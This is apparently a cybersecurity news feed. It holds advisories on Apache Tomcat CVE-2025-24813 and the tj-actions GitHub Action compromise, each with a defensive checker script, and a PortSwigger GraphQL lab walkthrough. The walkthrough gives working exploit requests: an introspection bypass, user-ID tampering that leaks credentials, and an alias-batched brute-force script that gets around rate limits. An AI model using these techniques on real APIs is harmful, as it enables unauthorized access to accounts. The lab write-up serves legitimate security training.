Singapore’s decision to adopt Oracle Cloud Infrastructure marks a significant step toward a more advanced and resilient defense system. With OCI’s cutting-edge security, AI-driven analytics, and scalable infrastructure, MINDEF is well-positioned to navigate the complexities of modern warfare and cybersecurity challenges.

The latest partnership with Singapore also comes on the heels of another major announcement last week, when Oracle launched an AI Centre of Excellence in Singapore to foster innovation across South-East Asia. The cloud computing provider has increased its focus on the region in recent times, announcing a $6.5 billion investment in AI and cloud computing in Malaysia last year, one of the biggest for the region.
by The Cyber Express
2025-03-19 10:10:37
Survey findings: AI Cyber Threats are a Reality, the People are Acting Now
Part 2/4: Darktrace releases insights on the State of AI in cybersecurity. This blog discusses AI’s impact on the cyber threat landscape.
by Darktrace
2025-03-19 10:07:04
New Arcane stealer spreads disguised as Minecraft cheats | Kaspersky official blog
Cybercriminals are spreading a stealer disguised as a "cheat manager" via YouTube videos to steal login credentials. Get the lowdown!
by Kaspersky
2025-03-19 10:00:42
Arcane stealer: We want all your data
The new Arcane stealer spreads via YouTube and Discord, collecting data from many applications, including VPN and gaming clients, network utilities, messaging apps, and browsers.
by Securelist
2025-03-19 09:55:00
Threat Spotlight: A million phishing-as-a-service attacks in two months highlight a fast-evolving threat
The first few months of 2025 saw a massive spike in phishing-as-a-service (PhaaS) attacks targeting organizations around the world, with more than a million attacks detected by Barracuda systems in January and February.
by Barracuda
2025-03-19 08:59:55
CISA Warns of Active Exploitation in GitHub Action Supply Chain Attack
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-30066 to its Known Exploited Vulnerabilities catalog, warning of a supply chain compromise in GitHub Actions. The vulnerability, affecting tj-actions/changed-files, allows attackers to extract sensitive secrets such as AWS keys and GitHub tokens from logs. The compromise was traced to reviewdog/action-setup@v1, a dependency, indicating a […]
by Zendata
2025-03-19 08:35:17
The Information Heist: Cracking the Code on Infostealers (New Hudson Rock Interview)
🔊 *Hudson Rock* is back with a new podcast episode! In this episode, Leonid Rozenberg, cybercrime and threat intelligence researcher, speaks with Kevin Poireault from Infosecurity Magazine about the Infostealer landscape in 2025. While Infostealers are still harvesting passwords and cookies, Leonid dives into additional malware features such as: 🔹 File-grabbing module 🔹 Credit card […]
by InfoStealers
2025-03-19 08:35:05
CERT NZ Warns of Critical Apache Tomcat Vulnerability (CVE-2025-24813) Under Active Exploitation
The New Zealand Computer Emergency Response Team (CERT NZ) has issued an urgent security advisory warning of a critical vulnerability, CVE-2025-24813, that affects several versions of Apache Tomcat. The flaw presents serious security risks, including remote code execution (RCE), information disclosure, and content corruption.

CVE-2025-24813 is found in Apache Tomcat versions 9.x, 10.x, and 11.x, with certain configurations making systems particularly susceptible to attack. According to the advisory, the flaw could allow an unauthenticated attacker to upload a malicious serialized payload to a vulnerable server and, if specific conditions are met, to execute arbitrary code on it.

The vulnerability is linked to Tomcat's default servlet, which handles HTTP requests. An attacker could exploit improper handling of file uploads by the default servlet to execute harmful code or gain access to sensitive information. The issue is particularly concerning because it could lead to remote code execution (RCE) or allow attackers to manipulate or corrupt sensitive data.

Affected Versions
The vulnerability affects the following versions of Apache Tomcat:
- Apache Tomcat 11.0.0-M1 to 11.0.2
- Apache Tomcat 10.1.0-M1 to 10.1.34
- Apache Tomcat 9.0.0.M1 to 9.0.98
These versions are vulnerable to CVE-2025-24813 if they meet the additional conditions outlined in the vendor advisory. Applications running on these versions are at risk if they allow file uploads with partial PUT support enabled, especially if attackers can manipulate the file paths and exploit insecure configurations.

How Attackers Could Exploit CVE-2025-24813
Exploiting CVE-2025-24813 requires specific conditions. To view sensitive files or inject malicious content into them, all of the following must be met:
- Writes enabled for the default servlet (disabled by default).
- Partial PUT support enabled (enabled by default).
- A target URL for sensitive uploads located within a sub-directory of public uploads.
- Knowledge of the names of the sensitive files being uploaded.
- The vulnerable files also being uploaded via partial PUT.
For an attacker to gain remote code execution, additional conditions must be met:
- The application is using Tomcat’s file-based session persistence with the default storage location.
- The application includes a library that could be used in a deserialization attack.
CERT NZ also noted that a proof-of-concept (PoC) and reports of active exploitation have already surfaced, making this flaw even more pressing for those running vulnerable versions.

Why You Should Be Concerned
The severity of CVE-2025-24813 cannot be overstated. Because it allows remote code execution and information disclosure, organizations could face severe consequences, including the unauthorized execution of arbitrary code, exposure of sensitive data, or corruption of vital application files. The flaw is particularly dangerous because it is relatively easy to exploit once the conditions for partial PUT support and the other configuration preconditions are met. For organizations that rely on Apache Tomcat to serve Java applications, the risk of exposure is significant, and immediate action is required.

How to Protect Your Systems
To mitigate the risks associated with CVE-2025-24813, Apache Tomcat users are advised to upgrade to the versions that fix the vulnerability:
- Apache Tomcat 11.0.3 or later
- Apache Tomcat 10.1.35 or later
- Apache Tomcat 9.0.99 or later
Upgrading to one of these versions ensures that systems are no longer vulnerable to this flaw. Additionally, system administrators should follow best practices for securing their Tomcat configurations, including disabling unnecessary features and ensuring that file upload capabilities are appropriately configured.

Conclusion
CVE-2025-24813 is actively being exploited, with a proof of concept confirmed by the NCSC. To mitigate risks, organizations should upgrade to Apache Tomcat versions 11.0.3, 10.1.35, or 9.0.99, disable unnecessary features, monitor for suspicious activity, and apply security patches promptly. As Apache Tomcat is widely used, keeping systems updated is crucial to avoid remote code execution, information disclosure, and content corruption.
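The two checks an operator can automate from the advisory above are the version ranges and the first precondition (writes enabled on the default servlet). The following is an added example, not code from CERT NZ or the Apache Tomcat project: it parses Tomcat version strings, including milestone builds, against the ranges listed above and inspects a conf/web.xml for the DefaultServlet `readonly` init-param (Tomcat's own parameter, true by default); the web.xml fragment is constructed for the demonstration.

```python
"""Check a Tomcat version and conf/web.xml against the CVE-2025-24813 conditions.

Added example, not from CERT NZ or the Apache Tomcat project. The version ranges
are the ones the advisory lists; the web.xml check covers the first precondition
the advisory names (writes enabled on the default servlet), which Tomcat controls
with the DefaultServlet 'readonly' init-param (true by default). The remaining
preconditions need application knowledge and are not checked here."""
import re
import xml.etree.ElementTree as ET

# (first affected, last affected, first fixed) per branch, as listed in the advisory.
AFFECTED_RANGES = [
    ("11.0.0-M1", "11.0.2", "11.0.3"),
    ("10.1.0-M1", "10.1.34", "10.1.35"),
    ("9.0.0.M1", "9.0.98", "9.0.99"),
]
DEFAULT_SERVLET_CLASS = "org.apache.catalina.servlets.DefaultServlet"
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?$")


def parse_version(version):
    """Turn '11.0.0-M1', '9.0.0.M1' or '10.1.34' into a comparable tuple.

    Milestone builds sort before the GA release of the same number: the fourth
    element is 0 for M<n> builds and 1 for GA, the fifth is the milestone number.
    """
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    major, minor, patch, milestone = m.groups()
    if milestone is None:
        return (int(major), int(minor), int(patch), 1, 0)
    return (int(major), int(minor), int(patch), 0, int(milestone))


def version_status(version):
    """Return (affected, first_fixed_version) for a Tomcat version string."""
    v = parse_version(version)
    for first, last, fixed in AFFECTED_RANGES:
        if parse_version(first) <= v <= parse_version(last):
            return True, fixed
    return False, None


def _local(tag):
    """Strip the XML namespace prefix ('{uri}name' -> 'name')."""
    return tag.rsplit("}", 1)[-1]


def default_servlet_params(web_xml):
    """Return the init-param name -> value map of the DefaultServlet declaration."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = next((c.text or "" for c in servlet if _local(c.tag) == "servlet-class"), "")
        if cls.strip() != DEFAULT_SERVLET_CLASS:
            continue
        params = {}
        for init_param in servlet:
            if _local(init_param.tag) != "init-param":
                continue
            fields = {_local(c.tag): (c.text or "").strip() for c in init_param}
            if "param-name" in fields:
                params[fields["param-name"]] = fields.get("param-value", "")
        return params
    return {}


def writes_enabled(web_xml):
    """True when 'readonly' is explicitly false: the advisory's first precondition."""
    return default_servlet_params(web_xml).get("readonly", "true").strip().lower() == "false"


def assess(version, web_xml):
    """Combine both checks into the summary an operator wants to see."""
    affected, fixed = version_status(version)
    return {
        "version": version,
        "affected_version": affected,
        "upgrade_to": fixed,
        "default_servlet_writable": writes_enabled(web_xml),
    }


# Constructed web.xml fragment (not from any real deployment) with the default
# servlet made writable, i.e. the risky setting the advisory describes.
SAMPLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
  </servlet>
</web-app>
"""

if __name__ == "__main__":
    print(assess("10.1.20", SAMPLE_WEB_XML))
```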
by The Cyber Express
2025-03-19 07:45:48
CISA Warns of Exploited GitHub Action CVE-2025-30066 – Users Urged to Patch
A security vulnerability (CVE-2025-30066) has been identified in a widely used third-party GitHub Action, tj-actions/changed-files. The flaw exposes sensitive information, including valid access keys, GitHub Personal Access Tokens (PATs), npm tokens, and private RSA keys. It has been patched in version 46.0.1, and users are urged to update immediately to protect their repositories and workflows.

What is tj-actions/changed-files?
tj-actions/changed-files is a popular GitHub Action that helps users track file modifications in pull requests and commits. It identifies changed files relative to a target branch, multiple branches, or specific commits, making it an essential tool for developers automating CI/CD workflows. However, in a recent supply chain compromise, attackers exploited a security weakness in this action, creating an information disclosure risk. The compromise was discovered by StepSecurity Harden-Runner and has since been addressed in the latest patch.

How Was the Action Compromised?
The compromise occurred between March 14 and March 15, 2025. Versions v1 through v45.0.7 were originally safe, but a malicious actor modified these tags to point to commit 0e58ed8, which contained a harmful updateFeatures code. This modification allowed attackers to read action logs and potentially extract sensitive credentials. Upon discovery, GitHub and the maintainer of tj-actions/changed-files took swift action to remove the compromised commit from all tags and branches. The issue was patched in version 46.0.1, and users are strongly advised to update immediately to prevent further exploitation.

CISA Flags CVE-2025-30066
The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-30066 to its Known Exploited Vulnerabilities Catalog, emphasizing the severity of the issue, and strongly urges organizations to follow the recommended mitigation steps when using third-party GitHub Actions.

Steps to Mitigate the Risk
Users who ran tj-actions/changed-files in their workflows between March 14 and March 15 should take the following steps:
1. Review Workflows for Suspicious Activity: Examine workflows executed during the affected period and look for unexpected output in the changed-files section. If anomalies are detected, decode them using:
   echo 'xxx' | base64 -d | base64 -d
   If the output contains sensitive credentials, immediately revoke and rotate those secrets.
2. Update to the Latest Version: If your workflows reference this action by SHA, update them immediately to avoid using the compromised commit. If using tagged versions (e.g., v35, v44.5.1), no action is required, as these tags have been updated to safe versions. The latest patched version is v46.0.1.
3. Rotate Any Potentially Exposed Secrets: As an added precaution, even if no suspicious activity is found, rotate secrets to ensure continued security.
4. Enhance Security Measures for Third-Party Actions: Regularly monitor security advisories for GitHub Actions. Consider implementing GitHub’s security features, such as Dependabot alerts and workflow permission restrictions. Restrict third-party actions to trusted sources only.

The compromise of tj-actions/changed-files is a significant example of supply chain attacks targeting the open-source community. Since many developers and organizations rely on third-party GitHub Actions to automate processes, a single compromised dependency can have widespread consequences.

Key Risks Posed by CVE-2025-30066
- Exposure of Sensitive Credentials: Attackers could extract GitHub PATs, npm tokens, RSA private keys, and other credentials from compromised workflows.
- Potential for Unauthorized Access: Stolen credentials could be used to manipulate repositories, inject malicious code, or gain unauthorized access to systems.
- Wide-Scale Impact: Given the popularity of this action, organizations across different industries may be affected.

Lessons From the Attack
The tj-actions/changed-files incident serves as a wake-up call for organizations relying on third-party dependencies. To minimize risks, cybersecurity experts recommend:
- Regularly Audit Dependencies: Periodically review and update third-party actions and dependencies to reduce exposure to vulnerabilities.
- Enable GitHub’s Security Features: Features like Dependency Graph, Dependabot Alerts, and Secret Scanning can help detect security issues early.
- Restrict Workflow Permissions: Avoid giving excessive permissions to third-party actions. Use the principle of least privilege (PoLP).
- Implement Zero-Trust Principles: Treat every third-party tool with caution and verify its integrity before integrating it into workflows.
- Monitor Security Advisories: Subscribe to GitHub security advisories and CISA alerts to stay updated on potential threats.

Conclusion
The compromise of tj-actions/changed-files (CVE-2025-30066) is a critical security issue that underlines the growing risks of supply chain attacks in software development. With GitHub Actions widely used to automate processes, organizations must prioritize security by regularly updating dependencies, restricting permissions, and monitoring for vulnerabilities. By following CISA’s recommendations and implementing proactive security measures, developers and organizations can mitigate the risk of similar attacks in the future.
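The mitigation steps above come down to three checks a repository owner can script: is any workflow pinned to the compromised commit, is the action referenced by a mutable tag (the thing the attacker retargeted), and does suspicious double-base64 output decode to something secret-like. The following is an added example, not code from CISA, GitHub or the tj-actions maintainers: it scans workflow text for `uses:` references without a YAML library, flags them by severity, and decodes the double-base64 blob the article tells reviewers to inspect. The commit prefix 0e58ed8 comes from the article; the workflow, its SHAs and the decoded sample string are constructed placeholders.

```python
"""Audit GitHub Actions workflow text for the tj-actions/changed-files exposure.

Added example, not from CISA, GitHub or the tj-actions maintainers. It flags
references pinned to the compromised commit (prefix 0e58ed8, from the article),
mutable tag references to the compromised action, and any other third-party
action not pinned to a full commit SHA, and decodes the double-base64 output
the article says to inspect ('echo ... | base64 -d | base64 -d')."""
import base64
import re
from dataclasses import dataclass

COMPROMISED_ACTION = "tj-actions/changed-files"
COMPROMISED_COMMIT_PREFIX = "0e58ed8"          # short hash quoted in the article
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^\s'"#]+)""")


@dataclass
class Finding:
    line_no: int
    ref: str
    level: str      # "critical", "warn" or "info"
    reason: str


def audit_workflow(text):
    """Return a Finding for every third-party action reference that needs attention."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue                                   # local or Docker action, not a tag ref
        action, _, version = ref.partition("@")
        owner_repo = "/".join(action.split("/")[:2])   # drop any sub-path inside the repo
        sha_pinned = bool(FULL_SHA_RE.match(version))
        if owner_repo == COMPROMISED_ACTION and version.startswith(COMPROMISED_COMMIT_PREFIX):
            findings.append(Finding(line_no, ref, "critical",
                "pinned to the compromised commit; remove it and rotate every "
                "secret the job could read"))
        elif owner_repo == COMPROMISED_ACTION and not sha_pinned:
            findings.append(Finding(line_no, ref, "warn",
                "mutable tag of the compromised action; review runs from 14-15 March "
                "2025, rotate secrets, and pin to a full commit SHA"))
        elif not sha_pinned:
            findings.append(Finding(line_no, ref, "info",
                "mutable tag or branch reference; pin third-party actions to a full "
                "40-character commit SHA"))
    return findings


def encode_twice(text):
    """Double-base64 a string, the shape of the output the article describes."""
    return base64.b64encode(base64.b64encode(text.encode("utf-8"))).decode("ascii")


def decode_twice(blob):
    """Undo encode_twice (the article's 'base64 -d | base64 -d'); None if not valid."""
    try:
        inner = base64.b64decode(blob, validate=True)
        return base64.b64decode(inner, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed workflow, not from any real repository; both SHAs are placeholders.
SAMPLE_WORKFLOW = f"""\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: tj-actions/changed-files@v45
      - uses: tj-actions/changed-files@{COMPROMISED_COMMIT_PREFIX}{'0' * 33}
      - uses: ./.github/actions/local-lint
      - uses: some-org/some-action@main
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f.line_no} [{f.level}] {f.ref}: {f.reason}")
    print(decode_twice(encode_twice("EXAMPLE_TOKEN=placeholder")))
```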
by The Cyber Express
2025-03-19 07:35:48
GraphQL Security: Understanding and Exploiting API VulnerabilitiesIntroduction Security practitioners need to specialize in protecting GraphQL because its powerful interface serves as a primary target for attackers. Users will find practical explanations of four laboratories at PortSwigger’s Web Security Academy which demonstrate how attackers exploit GraphQL through unauthorized data accessibility along with accidental field disclosure of hidden endpoints and brute force protection workarounds. The labs contain reconnaissance and exploitation followed by remediation sections that mirror authentic penetration testing approaches utilized in the field. All developers and bug bounty hunters will benefit from learning these techniques since they improve both exploitation skills and GraphQL API security abilities. Now we can go all days and weeks discussing about how graphql works and some vulnerabilities, but the best way to understand something is to do them hands on. For this we will be solving some portswigger labs. And make sure before solving labs, you have installed ==inQL== plugin in your burpsuite. Yes it can be installed on community edition as well. Lab 1: Accessing private GraphQL posts Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts App Exploration: First we see at at the page refresh, i.e each time page loads we see an POST request made. And each time we click view post we see another POST request is made. Now carefully look at the screenshot attached above. The first POST request that loads on each page refresh does not include variablesand might not be vulnerable when tested. We tried testing but nothing of much help was returned. Now in the second POST request the one marked with GREEN COLOUR, might be interesting as it includes an id parameter in it’s request. Graphql Introspection Query First we try and perform graphql introspection query. To do this manually you can refer to this medium article. 
Now we find the POST request made to /graphql/v1 endpoint, and let’s change the body of the POST query to the following. GraphQL Introspection Query: The GraphQL schema structure with its types along with fields directives and operations can be obtained through an introspection query. The metadata exposure relies on reserved __schema and __Type fields in this system. Now in our case the introspection query looks something like the following. {""query"": ""query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}""} Let’s quickly run through some of the important keywords in this graphql query. Root Operations: Fetches names of root types (queryType, mutationType, subscriptionType). Types: Retrieves all schema types via types using the FullType fragment. Fields: Includes deprecated fields, their arguments (InputValue fragment), return types (TypeRef fragment), and deprecation details. Inputs/Enums: Lists input fields, enum values (including deprecated ones), and possible union/interface types. Directives: Lists schema directives, their locations, and arguments. TypeRef Fragment: Unwraps nested types (e.g., NonNull(List(String))) via recursive ofType traversal. InputValue Fragment: Describes input arguments (name, type, default value). 
In the response, you will get all valid queries that we can use in graphql. This will be extremely useful in crafting graphql queries. Now let’s search for interesting parameters like emails and passwords. For emails we get 0 matches. But when we search for passwords we do find an query called postPassword. Getting password through graphql Now let’s go back to our repeater, this time in request tab you should see Graphql. Go to this section and add postPassword on the last line and let’s see our responses. We get our postPassword response as null. Hmm, that sounds interesting, what if we change variable values? On changing the id to 3 let’s see if we can get something interesting. For us this time we go get our password !!!. Alternate ways to identify graphql queries from graphql introspection using json. Now if you don’t want to search and traverse through all the queries from graphql introspection query, then you can simply copy the response header, only the json part. Save it to an text file, and load the text file with your graphql endpoint URL. If you are using inQL plugin then you should be able to scan for graphql queries. As you can see in the diagram bellow we do get our query which is nothing but postPassword Lab 2: Accidental exposure of private GraphQL fields Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure App Exploration: Now while exploring the lab, we see our login request is handled by graphql query. We also do see that upon login we can change password of our user, that input and request also get’s passed through graphql but, for now let’s tamper and play with login request and see if we can get any other user’s credentials. Graphql Introspection Query. The GraphQL schema structure with its types along with fields directives and operations can be obtained through an introspection query. 
The metadata exposure relies on the reserved __schema and __Type fields. Now send the login request to Repeater using Ctrl+R. Right-click, and at the top you should see GraphQL; when you hover over it you should see Set Introspection Query. Send the request to the server and observe the response. Now copy the JSON data from the request, save it to a text file, go to the InQL scanner, copy the endpoint, and enter this JSON data as input. You should see the valid queries that we can use in GraphQL. You can go ahead and try tampering with these parameters, but we end up getting nothing, so let's try something else. Here is a step-by-step guide of what we can do.

Step 1: Send the introspection query and watch the response. You can do this with a right-click and selecting ==Graphql > Set Introspection Query==
Step 2: Once you have sent the request, right-click it and select ==Graphql > Save GraphQL queries to site map==
Step 3: Go to Target and view the sitemap for your website; we see that 5 POST requests are made. The first (yellow) one makes getBlogPost and the second (orange) request performs a graphql query to getAllBlogPost, which is of little help to us. But the third request has something valuable: it gets a user. Send it to Repeater and see what happens.

By default, our POST request has JSON data like the following. We see that the id parameter has been set to 0.

{"query":"query($id: Int!) {\n getUser(id: $id) {\n id\n username\n password\n }\n}","variables":{"id":0}}

We see that we don't get anything interesting in the response.

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Set-Cookie: session=jZ2FQLiRy2iGKohvMlC1JLmszDYs0PfW; Secure; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 39

{ "data": { "getUser": null } }

Tampering with the id value. Now, what if we change the id to something like 1? Let's see what happens.
Our request looks like the following.

POST /graphql/v1 HTTP/2
Host: 0a6100d104bed431a027157e005d0023.web-security-academy.net
Cookie: session=2Jghu6Q0onW8xIcMyCgZoQvmVMd9vBzB
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Accept: application/json
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Content-Type: application/json; charset=utf-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: https://0a6100d104bed431a027157e005d0023.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a6100d104bed431a027157e005d0023.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 117

{"query":"query($id: Int!) {\n getUser(id: $id) {\n id\n username\n password\n }\n}","variables":{"id":1}}

Now we get the password for administrator.

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Set-Cookie: session=PzxIBAiGmDkkkSU4l9PZNHdH2NPsE32B; Secure; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 133

{ "data": { "getUser": { "id": 1, "username": "administrator", "password": "udggyox0zi3qtil5gqhl" } } }

Now we log in with these credentials and delete the carlos user. You can also try changing the id parameter to 2, 3 and so on to see other users' credentials. With this we solve the lab.

Lab 3: Finding a hidden GraphQL endpoint
Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint

Discovering the endpoint. To discover endpoints we first need to come up with a wordlist that contains the names of some endpoints that commonly exist for GraphQL. PortSwigger has already made a solution for this task; you can refer to this URL.
Now our wordlist should look like the following:

/graphql
/api
/api/graphql
/graphql/api
/graphql/graphql
/graphql/v1

Now let's start fuzzing for interesting endpoints. Note that, unlike the rest of the endpoints, /api does not return 404 but returns 400. Note that while fuzzing you should not URL-encode the characters. Now let's take a detailed look at the request.

Crafting a GraphQL query for our endpoint. The error tells us that we don't have a valid query for this endpoint. Let's have a look at the PortSwigger documentation (you can refer to this link). According to the Burp Suite documentation, when we try both attempts, the second one works. Here is how it looks inside Burp Suite. Below we are trying to set the introspection query with a newline and it fails; this is our first attempt as per the PortSwigger docs. Now, as per the PortSwigger docs, let's try sending a GET request, which translates to something like the following:

GET /api?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D

Notice that we are sending the GraphQL query with a newline character, which is %0A. The URL-decoded form of the above query looks like this:

query{__schema
{queryType{name}}}

This newline character is helpful in bypassing GraphQL introspection defences: it lets us send introspection queries when developers have restricted them. As you can see, our second attempt works when we include the query with a newline. Now, if we try to inject the GraphQL introspection query within this request we get an error. But what if we inject it in the GraphQL parameters instead of the normal HTTP GET request?

Bypassing GraphQL introspection defences with a newline
Let's switch to the GraphQL query and see if we can manually send the introspection. In the request section just switch from Pretty to GraphQL, replace the { with a newline, and we bypass the error and restriction. Now we are able to perform the introspection query!!
As we have done in the previous labs, let's quickly save the request to a JSON file and send it to the InQL scanner, or save the GraphQL queries to the sitemap once you are able to send introspection queries.

Deleting the carlos user
Now you might be wondering whether both methods get you the same results. Yes, but if you use the method where you first send the introspection query and then save the GraphQL queries to your sitemap, it saves you some time; it's a bit quicker and less messy. We found two queries: one deletes a user and another finds a user. Both GraphQL queries look something like the following.

mutation {
  deleteOrganizationUser(input: DeleteOrganizationUserInput) {
    user {
      id
      username
    }
  }
}

query {
  getUser(id: Int!) {
    id
    username
  }
}

Now let's add these to the sitemap; in the sitemap you need to go to /api to see the endpoints. Note that the one highlighted in red deletes a user, and the one in green lets us look up users by id. Now let's quickly send both requests to Repeater and tweak the id parameter of the getUser GraphQL query to find out the ids of users. The id variable with value 3 results in the user named carlos. Let's make a quick note of it and then use our deleteOrganizationUser GraphQL query to delete this user. With this we solve our lab!!

Lab 4: Bypassing GraphQL brute force protections
Lab URL - https://portswigger.net/web-security/graphql/lab-graphql-brute-force-protection-bypass

This lab is fairly simple. If you try to brute-force your way in, you will notice the rate-limiting feature applied in the web application. Let's quickly paste the following text into our browser console so that we can simulate the brute-force attack.

Performing the brute-force attack with a simple JS script.
copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>` bruteforce$index:login(input:{password: "$password", username: "carlos"}) { token success } `.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");

Once you have pasted the text, you will notice that the brute-force attack has started.

Packing our brute-force attack into a single GraphQL query
Since we already have valid user credentials, let's take a look at how the request looks inside Burp Suite. We notice the GraphQL section. Let's paste our brute-force text from the browser console here and look at the response.

Finding the password for the carlos user
We do get our response, and for us bruteforce8 returns true, which is 1234567, so let's try logging in to the carlos user with 1234567 as the password. And we do solve our lab. With these simple steps we solved the lab, but we did not yet understand why we were able to bypass the rate limits. For this, let's take a deeper look at this lab and what we have done.
Understanding rate limit bypasses in GraphQL
GraphQL's rate limiting can become a security issue when it only counts the number of HTTP requests rather than the individual operations performed inside a single request. Instead of sending separate login requests that would trigger the rate limit, you can pack multiple login attempts into one heavy GraphQL query using query aliasing. Here's the core of the attack: you build one large query that includes many login operations, each with its own alias (bruteforce0, bruteforce1, etc.), and each alias carries a different password from your list. The server processes every attempt in a single HTTP request, sidestepping a rate limiter that only watches the number of requests, not the number of operations. ==In a nutshell, we are packing our brute-force attack over all password candidates into a single GraphQL query using aliasing==.

A quick snippet in the browser console automates this:

copy(`123456,password,...`.split(',').map((element,index)=>
`
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
  token
  success
}
`
.replaceAll('$index',index)
.replaceAll('$password',element))
.join('\n'));

This script converts a list of passwords into a batch of login attempts. When executed, it reveals which alias, say bruteforce8, returns success, proving that one of the passwords, here 1234567, is valid.

Conclusion
The attack capabilities of GraphQL become evident through practical demonstrations which show both private post scraping through introspection and query aliasing for breaking rate limits. The key takeaway? Never assume obscurity equals security. Restrict introspection in live environments, review API components beyond introspection, check for unintended field access points, and deploy rate limits per operation rather than per request. Both InQL and Burp's GraphQL parser serve defenders by revealing possible leaks.
These labs show that even protected APIs can still carry vulnerabilities that are visible to anyone who looks closely. Ready to test your skills? Fire up Burp Suite and practise ethical GraphQL penetration testing.
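A defensive counterpart to the two techniques in this write-up, the newline-split introspection query from Lab 3 and alias batching from Lab 4, is to inspect the GraphQL document itself rather than counting HTTP requests or matching literal strings. The JavaScript below is an added example, not code from the HACKLIDO write-up or from PortSwigger: it tokenizes a document the way a GraphQL lexer does (whitespace, newlines and commas are insignificant), counts selections per field and aliases, and flags introspection fields; the policy values and the sample documents are assumed and constructed.

```javascript
// Added example (not from the write-up): request-side analysis of a GraphQL document.
// A limiter that counts HTTP requests misses alias batching; a filter that matches
// the literal string "__schema{" misses "__schema\n{". Both checks below work on
// tokens instead, so whitespace, newlines and commas make no difference.
// The policy values and the sample documents are assumed/constructed.

const INTROSPECTION_FIELDS = new Set(["__schema", "__type"]);
const KEYWORDS = new Set(["query", "mutation", "subscription", "fragment", "on"]);

// Assumed policy: at most this many aliased selections per document, and the
// login field may appear only once per document.
const POLICY = { maxAliases: 5, maxPerField: { login: 1 } };

// Blank out string literals and comments first, so that text inside them
// (e.g. a password containing "__schema") cannot confuse the scanner.
function stripStringsAndComments(doc) {
  return doc
    .replace(/"""[\s\S]*?"""/g, '""')   // block strings
    .replace(/"(?:\\.|[^"\\])*"/g, '""')  // ordinary strings
    .replace(/#[^\n\r]*/g, "");           // comments
}

// Split into GraphQL lexical tokens: names, spread, (blanked) strings, numbers,
// punctuators. Whitespace and commas are not tokens, exactly as in the spec.
function tokenize(doc) {
  const re = /[_A-Za-z][_0-9A-Za-z]*|\.\.\.|"[^"]*"|-?\d+(?:\.\d+)?|[{}():@$!\[\]=|&]/g;
  return stripStringsAndComments(doc).match(re) || [];
}

// Walk the tokens and count field selections. Arguments live inside (...), so
// a NAME ':' NAME pair outside parentheses is an alias, inside it is an argument.
function analyzeDocument(doc) {
  const tokens = tokenize(doc);
  const fields = {};          // field name -> number of selections
  let aliased = 0;
  let introspection = false;
  let parenDepth = 0;
  for (let i = 0; i < tokens.length; i++) {
    const t = tokens[i];
    if (t === "(") { parenDepth++; continue; }
    if (t === ")") { parenDepth--; continue; }
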